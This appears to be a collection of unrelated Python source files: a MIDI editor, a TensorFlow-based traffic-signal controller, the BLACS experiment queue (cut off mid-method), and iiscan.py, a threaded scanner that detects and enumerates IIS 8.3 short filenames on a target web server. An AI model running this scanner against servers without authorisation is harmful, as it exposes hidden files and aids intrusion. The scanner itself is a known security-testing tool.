self.__canvas.bind('<Button-1>', self.__add_note)
self.__canvas.bind('<ButtonRelease-1>', self.__end_add_note)
class MidiEditToplevel(Toplevel):
"""Standalone toplevel for hosting the midi editor."""
    def __init__(self, track: Track, on_save: Optional[Callable[[Track], None]] = None):
        super().__init__()
        MidiEditor(self, track)
if on_save:
self.bind('<F2>', lambda e: on_save(track))
class AlsaAudioIFace(AudioIFace):
def __init__(self, seq: Sequencer, port: PortInfo, ppb: int):
self.seq = seq
self.port = port
self.__last_note = -1
self.__pos = 0
# Start ticks per sec as a bogus value, respond to a SetTempo event
# while replaying.
self.__ticks_per_sec = 48
self.__stopped = True
self.__callback = None
self.__record_event = None
self.__thread = None
self.__track = None
self.__ppb = ppb
def begin_note_edit(self, note: int, velocity: int) -> None:
self.seq.sendEvent(NoteOn(0, 0, note, velocity), self.port)
self.__last_note = note
def next_note_edit(self, note: int, velocity: int) -> None:
if note != self.__last_note:
self.seq.sendEvent(NoteOff(0, 0, self.__last_note, 0), self.port)
self.seq.sendEvent(NoteOn(0, 0, note, velocity), self.port)
self.__last_note = note
def end_note_edit(self) -> None:
if self.__last_note == -1:
return
self.seq.sendEvent(NoteOff(0, 0, self.__last_note, 0), self.port)
self.__last_note = -1
def __run(self) -> None:
try:
# start time is the time when the beginning of the track started
start_time = time.time() - self.__pos / self.__ticks_per_sec
# Get the input handler to allow us to read midi events.
input_handle = self.seq.getPollHandle()
# 't' is current time in ticks.
t = self.__pos
cur = TrackCursor(self.__track)
cur.setPos(t)
while True:
event = cur.nextEvent()
if not event:
return
# Wait for the next event, doing a notification callback
# periodically.
next_event_ticks = event.time
tps = self.__ticks_per_sec
while t < next_event_ticks:
handles = select.select([input_handle], [], [input_handle],
min((next_event_ticks - t) / tps,
0.25
)
)
if self.__stopped:
return
self.__pos = t = int((time.time() - start_time) * tps)
# Process all input events.
if handles[0]:
while self.seq.hasEvent():
ev = self.seq.getEvent(t)
if isinstance(ev,
(NoteOn, NoteOff, ControlChange,
ProgramChange, PitchWheel)
):
self.seq.sendEvent(ev, self.port)
if self.__record_event:
self.__record_event(ev)
else:
                                print(f'got unknown event {ev}')
if self.__callback:
self.__callback(t)
if isinstance(event, (NoteOn, NoteOff, ControlChange,
ProgramChange, PitchWheel
)
):
self.seq.sendEvent(event, self.port)
elif isinstance(event, SetTempo):
print(f'usecs per qn {event.tempo}')
self.__ticks_per_sec = 1000000 / event.tempo * self.__ppb
finally:
for channel in range(16):
self.seq.sendEvent(AllSoundOff(0, channel), self.port)
def play(self, track: Track) -> None:
if not self.__stopped:
return
self.__stopped = False
self.__track = track
Thread(target=self.__run).start()
def set_play_callback(self, func: Callable[[int], None]) -> None:
self.__callback = func
def set_event_recorder(self, func: Callable[[MIDIEvent], None]) -> None:
self.__record_event = func
def set_pos(self, pos: int) -> None:
self.__pos = pos
if self.__callback:
self.__callback(pos)
def get_pos(self) -> int:
return self.__pos
def stop(self) -> None:
self.__stopped = True
def isPlaying(self) -> bool:
return not self.__stopped
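# --- Illustrative sketch (editor's addition, not part of the original module) ---
# AlsaAudioIFace.__run() converts a SetTempo event (microseconds per quarter
# note) into a tick rate with: ticks/sec = 1_000_000 / tempo * ppqn. The
# hypothetical helper below just restates that formula; for example 500000
# microseconds per quarter note (120 BPM) at 480 ppqn gives 960 ticks/sec.
def ticks_per_second(usecs_per_quarter: float, ppqn: int) -> float:
    return 1_000_000 / usecs_per_quarter * ppqn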
if __name__ == '__main__':
from sys import argv
track : Optional[Track] = None
if len(argv) > 1:
filename = argv[1]
if os.path.exists(filename):
piece = MidiFileReader(open(filename, 'rb')).readPiece()
track = tuple(piece.getTracks())[0]
else:
filename = 'unnamed.mid'
i = 1
while os.path.exists(filename):
filename = 'unnamed%s.mid' % i
i += 1
if track is None:
track = Track('unnamed')
def save(e: Event) -> None:
piece = Piece()
piece.addTrack(track)
MidiFileWriter(open(filename, 'wb')).writePiece(piece)
tk = Tk()
tk.bind('<F2>', save)
seq = Sequencer(SND_SEQ_OPEN_INPUT | SND_SEQ_OPEN_OUTPUT, 0, name='midiedit')
port = seq.createOutputPort('out')
seq.createInputPort('in')
print(f'ppqn = {track.ppqn}')
win = MidiEditor(tk, track, AlsaAudioIFace(seq, port, track.ppqn))
win.mainloop()
|
itmsFFLAP.py
|
import numpy as np
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import six.moves.urllib as urllib
import sys
from goto import with_goto
import threading
from threading import Thread
from multiprocessing import Process,Lock
import tarfile
#import RPi.GPIO as GPIO
#GPIO.setwarnings(False)
import time
from prettytable import PrettyTable
from datetime import date
from datetime import datetime
import tensorflow.compat.v1 as tf
from collections import defaultdict
from io import StringIO
import matplotlib.pyplot as plt
from PIL import Image
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
# This is needed since the notebook is stored in the object_detection folder.
sys.path.append("..")
# script repurposed from sentdex's edits and TensorFlow's example script. Pretty messy as not all unnecessary
# parts of the original have been removed
# # Model preparation
# ## Variables
# Any model exported using the `export_inference_graph.py` tool can be loaded here simply by changing `PATH_TO_CKPT` to point to a new .pb file.
# By default we use an "SSD with Mobilenet" model here. See the [detection model zoo](https://github.com/tensorflow/models/blob/master/object_detection/g3doc/detection_model_zoo.md) for a list of other models that can be run out-of-the-box with varying speeds and accuracies.
lock = threading.Lock()
lockg = threading.Lock()
# itms() below gates the GPIO thread with this semaphore, so it must stay
# defined even while the GPIO setup block underneath is commented out.
maxlimit = threading.Semaphore(2)
'''maxlimit = threading.Semaphore(2)
#GPIO OUTPUT SET
GPIO.setmode(GPIO.BOARD)
GPIO.setup(36,GPIO.OUT)
GPIO.setup(38,GPIO.OUT)
GPIO.setup(40,GPIO.OUT)
GPIO.setup(8,GPIO.OUT)
GPIO.setup(10,GPIO.OUT)
GPIO.setup(12,GPIO.OUT)
GPIO.setup(11,GPIO.OUT)
GPIO.setup(13,GPIO.OUT)
GPIO.setup(15,GPIO.OUT)
GPIO.setup(19,GPIO.OUT)
GPIO.setup(21,GPIO.OUT)
GPIO.setup(23,GPIO.OUT)
#ALLOFF
GPIO.output(38,0)
GPIO.output(10,0)
GPIO.output(13,0)
GPIO.output(21,0)
GPIO.output(12,0)
GPIO.output(15,0)
GPIO.output(23,0)
GPIO.output(40,0)
GPIO.output(36,0)
GPIO.output(8,0)
GPIO.output(11,0)
GPIO.output(19,0)
#RED-ON
GPIO.output(12,1)
GPIO.output(15,1)
GPIO.output(23,1)
GPIO.output(40,1)'''
MODEL_NAME = 'trained_model' # change to whatever folder has the new graph
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
PATH_TO_LABELS = os.path.join('training', 'label.pbtxt') # our labels are in training/object-detection.pbkt
NUM_CLASSES = 3 # we only are using one class at the moment (mask at the time of edit)
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
# ## Loading label map
# Label maps map indices to category names, so that when our convolution network predicts `5`, we know that this corresponds to `airplane`. Here we use internal utility functions, but anything that returns a dictionary mapping integers to appropriate string labels would be fine
# In[7]:
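# --- Illustrative note (editor's addition) ---
# label_map_util.create_category_index(), used in density() below, returns a
# dict keyed by class id, roughly of the form (label names here are
# hypothetical examples, the real ones come from training/label.pbtxt):
#   {1: {'id': 1, 'name': 'car'},
#    2: {'id': 2, 'name': 'truck'},
#    3: {'id': 3, 'name': 'Emergency-AMBULANCE'}}
# which is why em() can look up category_index[classes[j]]['name'].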
def gpio(lock,emergency,t):
lock.acquire()
print("GPIO Thread Activated")
time.sleep(40)
print("")
print("-----------------------------------------------------------------")
'''#LANE01
if(4==len(emergency)):
if(emergency[1] == 1):
print("Emergency Vehicle Detected in Lane 2")
#gpio_lane2
GPIO.output(12,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(8,1)
time.sleep(t[1])
GPIO.output(8,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(12,1)
if(4==len(emergency)):
if(emergency[2] == 1):
print("Emergency Vehicle Detected in Lane 3")
#gpio_lane3
GPIO.output(15,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(11,1)
time.sleep(t[2])
GPIO.output(11,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(15,1)
if(4==len(emergency)):
if(emergency[3] == 1):
print("Emergency Vehicle Detected in Lane 4 ")
#gpio_lane 4
GPIO.output(23,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(19,1)
time.sleep(t[3])
GPIO.output(19,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(23,1)
GPIO.output(40,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(36,1)
time.sleep(t[0])
GPIO.output(36,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(40,1)
if(4==len(emergency)):
if(emergency[1] == 1):
print("Emergency Vehicle Detected in Lane 2")
#gpio_lane2
GPIO.output(12,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(8,1)
time.sleep(t[1])
GPIO.output(8,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(12,1)
if(4==len(emergency)):
if(emergency[2] == 1):
print("Emergency Vehicle Detected in Lane 3")
#gpio_lane3
GPIO.output(15,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(11,1)
time.sleep(t[2])
GPIO.output(11,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(15,1)
if(4==len(emergency)):
if(emergency[3] == 1):
print("Emergency Vehicle Detected in Lane 4 ")
#gpio_lane 4
GPIO.output(23,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(19,1)
time.sleep(t[3])
GPIO.output(19,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(23,1)
#LANE02
GPIO.output(12,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(8,1)
time.sleep(t[1])
GPIO.output(8,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(12,1)
if(4==len(emergency)):
if(emergency[0] == 1):
print("Emergency Vehicle Detected in Lane 1")
#gpio_lane1
GPIO.output(40,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(36,1)
time.sleep(t[0])
GPIO.output(36,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(40,1)
if(4==len(emergency)):
if(emergency[2] == 1):
print("Emergency Vehicle Detected in Lane 3")
#gpio_lane3
GPIO.output(15,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(11,1)
time.sleep(t[2])
GPIO.output(11,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(15,1)
if(4==len(emergency)):
if(emergency[3] == 1):
print("Emergency Vehicle Detected in Lane 4 ")
#gpio_lane 4
GPIO.output(23,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(19,1)
time.sleep(t[3])
GPIO.output(19,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(23,1)
#LANE03
GPIO.output(15,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(11,1)
time.sleep(t[2])
GPIO.output(11,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(15,1)
if(4==len(emergency)):
if(emergency[0] == 1):
print("Emergency Vehicle Detected in Lane 1")
#gpio_lane1
GPIO.output(40,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(36,1)
time.sleep(t[0])
GPIO.output(36,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(40,1)
if(4==len(emergency)):
if(emergency[1] == 1):
print("Emergency Vehicle Detected in Lane 2")
#gpio_lane2
GPIO.output(12,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(8,1)
time.sleep(t[1])
GPIO.output(8,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(12,1)
if(4==len(emergency)):
if(emergency[3] == 1):
print("Emergency Vehicle Detected in Lane 4 ")
#gpio_lane 4
GPIO.output(23,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(19,1)
time.sleep(t[3])
GPIO.output(19,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(23,1)
#LANE04
GPIO.output(23,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(19,1)
time.sleep(t[3])
GPIO.output(19,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(23,1)
GPIO.output(23,1)
if(4==len(emergency)):
if(emergency[0] == 1):
print("Emergency Vehicle Detected in Lane 1")
#gpio_lane1
GPIO.output(40,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(36,1)
time.sleep(t[0])
GPIO.output(36,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(40,1)
if(4==len(emergency)):
if(emergency[1] == 1):
print("Emergency Vehicle Detected in Lane 2")
#gpio_lane2
GPIO.output(12,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(8,1)
time.sleep(t[1])
GPIO.output(8,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(12,1)
if(4==len(emergency)):
if(emergency[2] == 1):
print("Emergency Vehicle Detected in Lane 3")
#gpio_lane3
GPIO.output(15,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(11,1)
time.sleep(t[2])
GPIO.output(11,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(15,1)
maxlimit.release()'''
lock.release()
@with_goto
def itms(lockg,emergency,count):
lockg.acquire()
print("GPIO THREADING BEGINS SOOOON")
print("-----------------------------------------------------------------")
# assign timings to array t
label .c
if(4==len(count)):
c=count
t = []
for l in range(4):
ti = (c[l] * 4) + 2
t.append(ti)
now = datetime.now()
three=threading.active_count()
print("")
print("Current time =", now)
print("")
table = PrettyTable([' ','Lane 1','Lane 2','Lane 3','Lane 4'])
table.add_row(['Vehicle Count', c[0],c[1],c[2],c[3]] )
table.add_row(['Green Signal Time', t[0],t[1],t[2],t[3]] )
print(table)
print("")
print("Total Active Thread = ", three)
print("")
if maxlimit.acquire():
z = threading.Thread(target=gpio, args=(lock,emergency,t))
z.start()
else:
goto .c
lockg.release()
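# --- Illustrative sketch (editor's addition, not part of the original script) ---
# itms() above derives each lane's green-signal time as 4 seconds per detected
# vehicle plus a 2 second floor. The helper below is a hypothetical, standalone
# restatement of that rule; nothing in this script calls it.
def green_signal_times(vehicle_counts, per_vehicle=4, base=2):
    """Return one green-signal duration (in seconds) per lane."""
    return [count * per_vehicle + base for count in vehicle_counts]
# Example: lanes with 3, 0, 5 and 1 vehicles -> [14, 2, 22, 6] seconds.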
def density():
print("LANE VEHICLE COUNTING BEGUN")
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
def load_image_into_numpy_array(image):
(im_width, im_height) = image.size
return np.array(image.getdata()).reshape(
(im_height, im_width, 3)).astype(np.uint8)
# If you want to test the code with your images, just add path to the images to the TEST_IMAGE_PATHS.
PATH_TO_TEST_IMAGES_DIR = 'test'
TEST_IMAGE_PATHS = [os.path.join(PATH_TO_TEST_IMAGES_DIR, 'image{}.jpg'.format(i)) for i in range(1, 5)] # adjust range for # of images in folder
# Size, in inches, of the output images.
IMAGE_SIZE = (12, 8)
with detection_graph.as_default():
with tf.Session(graph=detection_graph) as sess:
count = []
emergency = []
i = 1
for image_path in TEST_IMAGE_PATHS:
image = Image.open(image_path)
labels = []
# the array based representation of the image will be used later in order to prepare the
# result image with boxes and labels on it.
image_np = load_image_into_numpy_array(image)
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
                # Each score represents the level of confidence for each of the objects.
                # The score is shown on the result image, together with the class label.
scores = detection_graph.get_tensor_by_name('detection_scores:0')
classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Actual detection.
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
np.squeeze(boxes),
np.squeeze(classes).astype(np.int32),
np.squeeze(scores),
category_index,
use_normalized_coordinates=True,
line_thickness=8)
classes = np.squeeze(classes).astype(np.int32)
def count_vehicle(scores):
final_score = np.squeeze(scores)
c = 0
for j in range(100):
if scores is None or final_score[j] > 0.5:
c = c + 1 #taking count of vehicles
return c
def em(scores):
e = 0
final_score = np.squeeze(scores)
for j in range(100):
if scores is None or final_score[j] > 0.5:
if classes[j] in category_index.keys():
labels.append(category_index[classes[j]]['name'])
if 'Emergency-AMBULANCE' in labels:
e = 1
else:
e = 0
return e
#plt.figure(figsize=IMAGE_SIZE)
plt.imshow(image_np) # matplotlib is configured for command line only so we save the outputs instead
plt.savefig("outputs/detection_output{}.png".format(i)) # create an outputs folder for the images to be saved
count.append(count_vehicle(scores))
emergency.append(em(scores))
i = i+1 # this was a quick fix for iteration, create a pull request if you'd like
            # Hand the per-lane counts to itms() on a worker thread.
            y = threading.Thread(target=itms, args=(lock, emergency, count))
            y.start()
density()
if __name__ == '__main__':
x=Process(target=density)
x.start()
|
iiscan.py
|
#!/usr/bin/env python
# encoding:utf-8
# An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com
import sys
import httplib
import urlparse
import threading
import Queue
import time
class Scanner():
def __init__(self, target):
self.target = target.lower()
if not self.target.startswith('http'):
self.target = 'http://%s' % self.target
        self.scheme, self.netloc, self.path, params, query, fragment = \
            urlparse.urlparse(self.target)
        if self.path[-1:] != '/':    # make sure the path ends with a slash
self.path += '/'
self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-'
self.files = []
self.dirs = []
self.queue = Queue.Queue()
self.lock = threading.Lock()
self.threads = []
self.request_method = ''
self.msg_queue = Queue.Queue()
self.STOP_ME = False
threading.Thread(target=self._print).start()
def _conn(self):
try:
if self.scheme == 'https':
conn = httplib.HTTPSConnection(self.netloc)
else:
conn = httplib.HTTPConnection(self.netloc)
return conn
except Exception, e:
print '[_conn.Exception]', e
return None
def _get_status(self, path):
try:
conn = self._conn()
conn.request(self.request_method, path)
status = conn.getresponse().status
conn.close()
return status
except Exception, e:
raise Exception('[_get_status.Exception] %s' % str(e) )
def is_vul(self):
try:
for _method in ['GET', 'OPTIONS']:
self.request_method = _method
status_1 = self._get_status(self.path + '/*~1*/a.aspx') # a wildcard that matches an existing file/folder
status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx') # a wildcard that cannot match any file/folder
if status_1 == 404 and status_2 != 404:
return True
return False
except Exception, e:
raise Exception('[is_vul.Exception] %s' % str(e) )
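# How the vulnerability check works: IIS servers with 8.3 (short) filename
# support answer requests containing the tilde wildcard pattern '*~1*'
# differently depending on whether a matching short name exists. A pattern
# that matches something returns 404 for the bogus trailing 'a.aspx', while
# the random 'l1j1e' prefix (which cannot match anything) returns a different
# status. If the two statuses differ, short names can be enumerated one
# character at a time.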
def run(self):
for c in self.alphanum:
self.queue.put( (self.path + c, '.*') ) # filename, extension
for i in range(20):
t = threading.Thread(target=self._scan_worker)
self.threads.append(t)
t.start()
for t in self.threads:
t.join()
self.STOP_ME = True
def report(self):
print '-'* 64
for d in self.dirs:
print 'Dir: %s' % d
for f in self.files:
print 'File: %s' % f
print '-'*64
print '%d Directories, %d Files found in total' % (len(self.dirs), len(self.files))
print 'Note that * is a wildcard that matches zero or more characters.'
def _print(self):
while not self.STOP_ME or (not self.msg_queue.empty()):
if self.msg_queue.empty():
time.sleep(0.05)
else:
print self.msg_queue.get()
def _scan_worker(self):
while True:
try:
url, ext = self.queue.get(timeout=1.0)
status = self._get_status(url + '*~1' + ext + '/1.aspx')
if status == 404:
self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext))
if len(url) - len(self.path)< 6: # enum first 6 chars only
for c in self.alphanum:
self.queue.put( (url + c, ext) )
else:
if ext == '.*':
self.queue.put( (url, '') )
if ext == '':
self.dirs.append(url + '~1')
self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]')
elif len(ext) == 5 or (not ext.endswith('*')): # .asp*
self.files.append(url + '~1' + ext)
self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]')
else:
for c in 'abcdefghijklmnopqrstuvwxyz0123456789':
self.queue.put( (url, ext[:-1] + c + '*') )
if len(ext) < 4: # < len('.as*')
self.queue.put( (url, ext[:-1] + c) )
except Queue.Empty,e:
break
except Exception, e:
print '[Exception]', e
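# Enumeration strategy used by _scan_worker: 8.3 short names have at most a
# 6-character name prefix and a 3-character extension, so the worker grows the
# guessed prefix one character at a time (up to 6 characters) and then
# switches to guessing the extension. A trailing '*' in the extension means it
# is still partial; once the extension is complete (or 3 characters long) the
# result is reported as a file, and an empty extension means a directory.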
if __name__ == '__main__':
if len(sys.argv) == 1:
print 'Usage: python IIS_shortname_Scan.py http://www.target.com/'
sys.exit()
target = sys.argv[1]
s = Scanner(target)
if not s.is_vul():
s.STOP_ME = True
print 'Server is not vulnerable'
sys.exit(0)
print 'Server is vulnerable, please wait, scanning...'
s.run()
s.report()
|
experiment_queue.py
|
#####################################################################
# #
# /experiment_queue.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
if PY2:
str = unicode
import Queue as queue
else:
import queue
import logging
import os
import platform
import threading
import time
import sys
import shutil
from collections import defaultdict
from tempfile import gettempdir
from binascii import hexlify
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
import zprocess
from labscript_utils.ls_zprocess import ProcessTree
process_tree = ProcessTree.instance()
import labscript_utils.h5_lock, h5py
from qtutils import *
from labscript_utils.qtwidgets.elide_label import elide_label
from labscript_utils.connections import ConnectionTable
import labscript_utils.properties
from blacs.tab_base_classes import MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL, MODE_BUFFERED
import blacs.plugins as plugins
def tempfilename(prefix='BLACS-temp-', suffix='.h5'):
"""Return a filepath appropriate for use as a temporary file"""
random_hex = hexlify(os.urandom(16)).decode()
return os.path.join(gettempdir(), prefix + random_hex + suffix)
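# Example of the kind of path produced (illustrative only, on a Linux temp dir):
# /tmp/BLACS-temp-3f9c0a1b2c4d5e6f7a8b9c0d1e2f3a4b.h5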
FILEPATH_COLUMN = 0
class QueueTreeview(QTreeView):
def __init__(self,*args,**kwargs):
QTreeView.__init__(self,*args,**kwargs)
self.header().setStretchLastSection(True)
self.setAutoScroll(False)
self.add_to_queue = None
self.delete_selection = None
self._logger = logging.getLogger('BLACS.QueueManager')
def keyPressEvent(self,event):
if event.key() == Qt.Key_Delete:
event.accept()
if self.delete_selection:
self.delete_selection()
QTreeView.keyPressEvent(self,event)
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.accept()
else:
event.ignore()
def dragMoveEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
else:
event.ignore()
def dropEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
for url in event.mimeData().urls():
path = str(url.toLocalFile())
if path.endswith('.h5') or path.endswith('.hdf5'):
self._logger.info('Acceptable file dropped. Path is %s'%path)
if self.add_to_queue:
self.add_to_queue(str(path))
else:
self._logger.info('Dropped file not added to queue because there is no access to the necessary add_to_queue method')
else:
self._logger.info('Invalid file dropped. Path was %s'%path)
else:
event.ignore()
class QueueManager(object):
REPEAT_ALL = 0
REPEAT_LAST = 1
ICON_REPEAT = ':qtutils/fugue/arrow-repeat'
ICON_REPEAT_LAST = ':qtutils/fugue/arrow-repeat-once'
def __init__(self, BLACS, ui):
self._ui = ui
self.BLACS = BLACS
self.last_opened_shots_folder = BLACS.exp_config.get('paths', 'experiment_shot_storage')
self._manager_running = True
self._manager_paused = False
self._manager_repeat = False
self._manager_repeat_mode = self.REPEAT_ALL
self.master_pseudoclock = self.BLACS.connection_table.master_pseudoclock
self._logger = logging.getLogger('BLACS.QueueManager')
# Create listview model
self._model = QStandardItemModel()
self._create_headers()
self._ui.treeview.setModel(self._model)
self._ui.treeview.add_to_queue = self.process_request
self._ui.treeview.delete_selection = self._delete_selected_items
# set up buttons
self._ui.queue_pause_button.toggled.connect(self._toggle_pause)
self._ui.queue_repeat_button.toggled.connect(self._toggle_repeat)
self._ui.queue_delete_button.clicked.connect(self._delete_selected_items)
self._ui.queue_clear_button.clicked.connect(self._toggle_clear)
self._ui.actionAdd_to_queue.triggered.connect(self.on_add_shots_triggered)
self._ui.queue_add_button.setDefaultAction(self._ui.actionAdd_to_queue)
self._ui.queue_push_up.clicked.connect(self._move_up)
self._ui.queue_push_down.clicked.connect(self._move_down)
self._ui.queue_push_to_top.clicked.connect(self._move_top)
self._ui.queue_push_to_bottom.clicked.connect(self._move_bottom)
# Set the elision of the status labels:
elide_label(self._ui.queue_status, self._ui.queue_status_verticalLayout, Qt.ElideRight)
elide_label(self._ui.running_shot_name, self._ui.queue_status_verticalLayout, Qt.ElideLeft)
# Set up repeat mode button menu:
self.repeat_mode_menu = QMenu(self._ui)
self.action_repeat_all = QAction(QIcon(self.ICON_REPEAT), 'Repeat all', self._ui)
self.action_repeat_last = QAction(QIcon(self.ICON_REPEAT_LAST), 'Repeat last', self._ui)
self.action_repeat_all.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_ALL))
self.action_repeat_last.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_LAST))
self.repeat_mode_menu.addAction(self.action_repeat_all)
self.repeat_mode_menu.addAction(self.action_repeat_last)
self._ui.repeat_mode_select_button.setMenu(self.repeat_mode_menu)
# The button already has an arrow indicating a menu, don't draw another one:
self._ui.repeat_mode_select_button.setStyleSheet("QToolButton::menu-indicator{width: 0;}")
self.manager = threading.Thread(target = self.manage)
self.manager.daemon=True
self.manager.start()
def _create_headers(self):
self._model.setHorizontalHeaderItem(FILEPATH_COLUMN, QStandardItem('Filepath'))
def get_save_data(self):
# get list of files in the queue
file_list = []
for i in range(self._model.rowCount()):
file_list.append(self._model.item(i).text())
# get button states
return {'manager_paused':self.manager_paused,
'manager_repeat':self.manager_repeat,
'manager_repeat_mode':self.manager_repeat_mode,
'files_queued':file_list,
'last_opened_shots_folder': self.last_opened_shots_folder
}
def restore_save_data(self,data):
if 'manager_paused' in data:
self.manager_paused = data['manager_paused']
if 'manager_repeat' in data:
self.manager_repeat = data['manager_repeat']
if 'manager_repeat_mode' in data:
self.manager_repeat_mode = data['manager_repeat_mode']
if 'files_queued' in data:
file_list = list(data['files_queued'])
self._model.clear()
self._create_headers()
for file in file_list:
self.process_request(str(file))
if 'last_opened_shots_folder' in data:
self.last_opened_shots_folder = data['last_opened_shots_folder']
@property
@inmain_decorator(True)
def manager_running(self):
return self._manager_running
@manager_running.setter
@inmain_decorator(True)
def manager_running(self,value):
value = bool(value)
self._manager_running = value
def _toggle_pause(self,checked):
self.manager_paused = checked
def _toggle_clear(self):
self._model.clear()
self._create_headers()
@property
@inmain_decorator(True)
def manager_paused(self):
return self._manager_paused
@manager_paused.setter
@inmain_decorator(True)
def manager_paused(self,value):
value = bool(value)
self._manager_paused = value
if value != self._ui.queue_pause_button.isChecked():
self._ui.queue_pause_button.setChecked(value)
def _toggle_repeat(self,checked):
self.manager_repeat = checked
@property
@inmain_decorator(True)
def manager_repeat(self):
return self._manager_repeat
@manager_repeat.setter
@inmain_decorator(True)
def manager_repeat(self,value):
value = bool(value)
self._manager_repeat = value
if value != self._ui.queue_repeat_button.isChecked():
self._ui.queue_repeat_button.setChecked(value)
@property
@inmain_decorator(True)
def manager_repeat_mode(self):
return self._manager_repeat_mode
@manager_repeat_mode.setter
@inmain_decorator(True)
def manager_repeat_mode(self, value):
assert value in [self.REPEAT_LAST, self.REPEAT_ALL]
self._manager_repeat_mode = value
button = self._ui.queue_repeat_button
if value == self.REPEAT_ALL:
button.setIcon(QIcon(self.ICON_REPEAT))
elif value == self.REPEAT_LAST:
button.setIcon(QIcon(self.ICON_REPEAT_LAST))
def on_add_shots_triggered(self):
shot_files = QFileDialog.getOpenFileNames(self._ui, 'Select shot files',
self.last_opened_shots_folder,
"HDF5 files (*.h5)")
if isinstance(shot_files, tuple):
shot_files, _ = shot_files
if not shot_files:
# User cancelled selection
return
